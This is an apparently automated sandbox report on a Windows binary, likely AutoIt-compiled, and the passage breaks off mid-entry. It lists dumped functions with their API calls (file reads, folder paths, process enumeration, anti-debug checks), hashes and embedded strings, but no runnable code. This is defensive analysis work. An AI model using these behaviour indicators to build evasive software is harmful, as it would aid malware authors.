                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Window_memmove
                                            • String ID:
                                            • API String ID: 517827167-0
                                            • Opcode ID: 1f807fe924ccaaee709dbde09476444892c251780e675073a009aa5a55d85fa8
                                            • Instruction ID: 24fcf0f771782685bc1c6e9e9f5c9c5d3842999e0fe9f8f958c64d3d1b82cb69
                                            • Opcode Fuzzy Hash: 1f807fe924ccaaee709dbde09476444892c251780e675073a009aa5a55d85fa8
                                            • Instruction Fuzzy Hash: 60118E733441267AE340BAA8EC80EFBF75CEBE1768F008127FE4896101CA75A91587F0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013440A2, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                            Download Yara Rule
                                            APIs
                                            • _memmove.LIBCMT ref: 01344108
                                              • Part of subcall function 013014F7: _malloc.LIBCMT ref: 01301511
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _malloc_memmove
                                            • String ID:
                                            • API String ID: 1183979061-0
                                            • Opcode ID: 9e468ae535f67792b42f446acda92264e0df4de02b4459fd07ab36354bda8c8d
                                            • Instruction ID: 0427e530436ffdb1631fa313c16d7deec1da673dc3cc6b433ebd5f771c68df93
                                            • Opcode Fuzzy Hash: 9e468ae535f67792b42f446acda92264e0df4de02b4459fd07ab36354bda8c8d
                                            • Instruction Fuzzy Hash: 8201D872104612ABD711BF9DD880F5BFBECAFE5328710853AF95497240D731B52187A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012F3B40, Relevance: 1.6, APIs: 1, Instructions: 52fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadFile.KERNELBASE(00000000,?,00010000,?,00000000,?,?), ref: 012F3B92
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: a9c4af2f833f5ede84d8cda4bf2ff873577ac81e721e04745dc98def3b03bbc2
                                            • Instruction ID: dff1887014a8ab9d9626acd161c9d9118c35e933f0d9ea2d75d5ebe0b3134434
                                            • Opcode Fuzzy Hash: a9c4af2f833f5ede84d8cda4bf2ff873577ac81e721e04745dc98def3b03bbc2
                                            • Instruction Fuzzy Hash: 7511F875610B0A9FD720CF59C860B67FBF8BB54750F10892DD69A86A50E770E845CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0130F597, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000008,013012DC,00000000,?,01306A7F,?,013012DC,00000000,00000000,00000000,?,0130793E,00000001,00000214,?,013012DC), ref: 0130F5DA
                                              • Part of subcall function 01307E9A: __getptd_noexit.LIBCMT ref: 01307E9A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AllocateHeap__getptd_noexit
                                            • String ID:
                                            • API String ID: 328603210-0
                                            • Opcode ID: ab7a7bbcbd96a7aa9cb15b57536393343707f0e614798990ed2f5f6be60efd35
                                            • Instruction ID: 9bbfca502a01b5d84a1b05ba42a4e721855ea2f91bf7fbe3f16574258d476b84
                                            • Opcode Fuzzy Hash: ab7a7bbcbd96a7aa9cb15b57536393343707f0e614798990ed2f5f6be60efd35
                                            • Instruction Fuzzy Hash: 14019E362012199BEB3B9E39DC74B6B3BDCAB81768F198529E8168A1D0D771D800C750
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012F3250, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _memmove
                                            • String ID:
                                            • API String ID: 4104443479-0
                                            • Opcode ID: 05e0fdb8517c982d3095a23e2f7b2e158b43b405ddd3fb96314c558e6f00c771
                                            • Instruction ID: ae69d871b94198cc24cba3ea15dc0efa30411117a9413a8043ad4e7980361a20
                                            • Opcode Fuzzy Hash: 05e0fdb8517c982d3095a23e2f7b2e158b43b405ddd3fb96314c558e6f00c771
                                            • Instruction Fuzzy Hash: EC0125756106019FC329DB6CC98192BB3E8EFA9744710886DE59AC7761EA32E802CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013430A7, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 013014F7: _malloc.LIBCMT ref: 01301511
                                              • Part of subcall function 013014F7: std::exception::exception.LIBCMT ref: 01301546
                                              • Part of subcall function 013014F7: std::exception::exception.LIBCMT ref: 01301560
                                              • Part of subcall function 013014F7: __CxxThrowException@8.LIBCMT ref: 01301571
                                            • _memset.LIBCMT ref: 013430E3
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8Throw_malloc_memset
                                            • String ID:
                                            • API String ID: 1169493612-0
                                            • Opcode ID: a73ee94afd5d571b732e3ddfe695990b0f99e800c6ba9e38026172d24cbc6c7e
                                            • Instruction ID: 2b259e4da7ec18037157b8ad7fba9b6eddb479ddc66c7f2149b974a83f59b2f2
                                            • Opcode Fuzzy Hash: a73ee94afd5d571b732e3ddfe695990b0f99e800c6ba9e38026172d24cbc6c7e
                                            • Instruction Fuzzy Hash: 3A11F3B52002019FD310EF5CD490F62BBE5EFA9314F25856DE2898B391D772E801CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0135FD26, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _wcscpy
                                            • String ID:
                                            • API String ID: 3048848545-0
                                            • Opcode ID: c268edffd11c4cbb4d224b8625af7d214eeeb5606354a08f8d4cf2e0546bcfa6
                                            • Instruction ID: 2f1155d1f25686b3b196cc12763c556d5753f09e112dd1399d6a8c0eee3b6b42
                                            • Opcode Fuzzy Hash: c268edffd11c4cbb4d224b8625af7d214eeeb5606354a08f8d4cf2e0546bcfa6
                                            • Instruction Fuzzy Hash: 89F0EC77114215369710BF69BC41CEBF79CEFA6374710062BFA5457180E562B45583F0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01333C1D, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                            Download Yara Rule
                                            APIs
                                            • _wcslen.LIBCMT ref: 01333C38
                                              • Part of subcall function 01323D83: EnumProcesses.PSAPI(?,00000800,?,?,01333C4D,?,?,?,01398178), ref: 01323DA0
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: EnumProcesses_wcslen
                                            • String ID:
                                            • API String ID: 3303492691-0
                                            • Opcode ID: 9e127af8b48c35b2fcf89a1e58bc8d436993b4a5b50931e15b82a617295fb590
                                            • Instruction ID: c47d164c08400572361a2280f2543dddc49f3ec96036bc5bf16aa924c06e216b
                                            • Opcode Fuzzy Hash: 9e127af8b48c35b2fcf89a1e58bc8d436993b4a5b50931e15b82a617295fb590
                                            • Instruction Fuzzy Hash: C0E0E573A000143BE711654FBC80EDF735CEFD523CF044062F60D87101A221A90583F6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012FECD0, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 013014F7: _malloc.LIBCMT ref: 01301511
                                            • CharUpperBuffW.USER32(?,?), ref: 012FED03
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: BuffCharUpper_malloc
                                            • String ID:
                                            • API String ID: 1573836695-0
                                            • Opcode ID: 249ffe1c3a6eb03406b95456cd58bf883e7770ab16cd0ef170e978eebb8b9555
                                            • Instruction ID: 9311378ef92f9673764f7a30950f2283c0470db8874cd257e18ba4891a69bb42
                                            • Opcode Fuzzy Hash: 249ffe1c3a6eb03406b95456cd58bf883e7770ab16cd0ef170e978eebb8b9555
                                            • Instruction Fuzzy Hash: E6F012706105218BDB225F58E540726FBA8EF14751F06816EFE498F296C774D801CBD1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012FD9C0, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                            Download Yara Rule
                                            APIs
                                            • FindCloseChangeNotification.KERNELBASE(?,?,01316F2F), ref: 012FD9DD
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ChangeCloseFindNotification
                                            • String ID:
                                            • API String ID: 2591292051-0
                                            • Opcode ID: 0e617bccc4bbea419f145a0abe32a36f7570970de12c47e4c0a4845e6a347b66
                                            • Instruction ID: b8a28d01a1ee2ae3218ec53b1f5a5f49b9cfb4423c5b9386d1ec6dcdc64f03bd
                                            • Opcode Fuzzy Hash: 0e617bccc4bbea419f145a0abe32a36f7570970de12c47e4c0a4845e6a347b66
                                            • Instruction Fuzzy Hash: 58E0DEB5900B059AD7318F5EE444416FBF9AFE46217208E1FD6E6C2A64D3B4A1898F50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012FE270, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001,?,00002000), ref: 012FE288
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: bf4725bdd23c71a43cf0ec1f2a0def336bec3d42c7ad45c3b4d919a5130c1d10
                                            • Instruction ID: a10b305996ef13d6cdd93557ddd2f8f72a5c7b0588e157af29ee6f531f8cb62c
                                            • Opcode Fuzzy Hash: bf4725bdd23c71a43cf0ec1f2a0def336bec3d42c7ad45c3b4d919a5130c1d10
                                            • Instruction Fuzzy Hash: 0FE01779600208BFC718DFA4D846DABB7BDEB88301F0082A8FD01D7344E671AE508BA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013048E2, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __wfsopen
                                            • String ID:
                                            • API String ID: 197181222-0
                                            • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                            • Instruction ID: ead310191bd2f28a1fe8e20e52826f3dcc7a031aeb81b49fac8a537836124625
                                            • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                            • Instruction Fuzzy Hash: 60C0927244024C77CF122A86ED02F4A3F9A9BD0A64F048020FB1C191A0EA73EB61D6D9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 0130A128, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                            Download Yara Rule
                                            APIs
                                            • IsDebuggerPresent.KERNEL32 ref: 01311EE1
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01311EF6
                                            • UnhandledExceptionFilter.KERNEL32(013743DC), ref: 01311F01
                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 01311F1D
                                            • TerminateProcess.KERNEL32(00000000), ref: 01311F24
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                            • String ID:
                                            • API String ID: 2579439406-0
                                            • Opcode ID: 72d6590d75ee0d071a4409be6c8ed588ebba3e1d9c02d4fdc98dfe6dd21caa42
                                            • Instruction ID: 30ec153ff89bc87d904e1793fd5a50db1484c94c2bee78f9ec0230623020c8b1
                                            • Opcode Fuzzy Hash: 72d6590d75ee0d071a4409be6c8ed588ebba3e1d9c02d4fdc98dfe6dd21caa42
                                            • Instruction Fuzzy Hash: 7421CAB88013049FEB75DF68F9856887BBEFB08354F60015AF9188B748E7B169858F15
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01358322, Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 116COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __wcsicoll$__wcsnicmp
                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                            • API String ID: 790654849-1810252412
                                            • Opcode ID: 8eebe9bdb782a24a55a90fa822b296e86b430d6e9b80233652ebb4fe07eb0e3a
                                            • Instruction ID: 31e0cba024e3901752f0f94382e8ef9dc45cc22744a0ee0642856c2daae939e6
                                            • Opcode Fuzzy Hash: 8eebe9bdb782a24a55a90fa822b296e86b430d6e9b80233652ebb4fe07eb0e3a
                                            • Instruction Fuzzy Hash: 0631C071E1420A96DB11FB65DD51EEEB3BCAF21609F500179EE40B71D1DA24EE04C7A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01342833, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 172COMMON
                                            Download Yara Rule
                                            APIs
                                            • _fseek.LIBCMT ref: 013428A1
                                              • Part of subcall function 0134268F: __fread_nolock.LIBCMT ref: 013426B4
                                              • Part of subcall function 0134268F: __fread_nolock.LIBCMT ref: 013426F6
                                              • Part of subcall function 0134268F: __fread_nolock.LIBCMT ref: 01342714
                                              • Part of subcall function 0134268F: _wcscpy.LIBCMT ref: 01342748
                                              • Part of subcall function 0134268F: __fread_nolock.LIBCMT ref: 01342758
                                              • Part of subcall function 0134268F: __fread_nolock.LIBCMT ref: 01342776
                                              • Part of subcall function 0134268F: _wcscpy.LIBCMT ref: 013427A7
                                            • __fread_nolock.LIBCMT ref: 013428D8
                                            • __fread_nolock.LIBCMT ref: 013428E8
                                            • __fread_nolock.LIBCMT ref: 01342901
                                            • __fread_nolock.LIBCMT ref: 0134291B
                                            • _fseek.LIBCMT ref: 01342935
                                            • _malloc.LIBCMT ref: 01342940
                                            • _malloc.LIBCMT ref: 0134294C
                                            • __fread_nolock.LIBCMT ref: 0134295D
                                            • _free.LIBCMT ref: 0134298C
                                            • _free.LIBCMT ref: 01342995
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                            • String ID: >>>AUTOIT SCRIPT<<<$C:\84086963\fqficjon.emu
                                            • API String ID: 1255752989-2640477962
                                            • Opcode ID: 79b2132a43099c96be8de6d6571aeafd63b7f31884eb0181d363dd31bc64da8e
                                            • Instruction ID: 25f3c8e22a820c3d3f908a355d5aa72d3037e98ddf850e092f65138f2fc9d30c
                                            • Opcode Fuzzy Hash: 79b2132a43099c96be8de6d6571aeafd63b7f31884eb0181d363dd31bc64da8e
                                            • Instruction Fuzzy Hash: 9D5120B1D00218AFDB20DF68DC81B9AB7F8EF98314F0045A9E64CE7280E7719A84CF55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013241CD, Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __wcsicoll$IconLoad
                                            • String ID: blank$info$question$stop$warning
                                            • API String ID: 2485277191-404129466
                                            • Opcode ID: 2a5e3365b4656cb105715922e6df1550f6911faec603ed50ae1f9d9194690b92
                                            • Instruction ID: fb0c58bd6ba33858c5673d0b3facff0ba5f00ca002086d4bd8a1909969591266
                                            • Opcode Fuzzy Hash: 2a5e3365b4656cb105715922e6df1550f6911faec603ed50ae1f9d9194690b92
                                            • Instruction Fuzzy Hash: 5721DA7274031666DB216B6ABC06FEB73ACDF5536AF040037F904E2286E3A5E52493F5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01362095, Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 377timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 013620BD
                                            • _memset.LIBCMT ref: 013620DB
                                            • GetLocalTime.KERNEL32(?), ref: 0136225C
                                            • __swprintf.LIBCMT ref: 01362273
                                            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0137BF48), ref: 013624A6
                                            • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0137BF48), ref: 013624C0
                                            • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0137BF48), ref: 013624DA
                                            • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0137BF48), ref: 013624F4
                                            • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0137BF48), ref: 0136250E
                                            • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0137BF48), ref: 01362528
                                            • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0137BF48), ref: 01362542
                                            • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0137BF48), ref: 0136255C
                                            • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0137BF48), ref: 01362576
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FolderPath$_memset$LocalTime__swprintf
                                            • String ID: %.3d
                                            • API String ID: 645292623-986655627
                                            • Opcode ID: 2d8a9740c3358b409577eb5eedae2aa94e1faa971f2887859a5e79ea883a9681
                                            • Instruction ID: 2911cb0a8525e487fba2bc5c171ed5518bc2d45c47afcc508e21a53983c99436
                                            • Opcode Fuzzy Hash: 2d8a9740c3358b409577eb5eedae2aa94e1faa971f2887859a5e79ea883a9681
                                            • Instruction Fuzzy Hash: 9FC1C83266420AABDB60FB64DC89FFEB37CFB64704F40456DE609A70C0DB719A058B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0135E7D4, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 207windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 0135E7EF
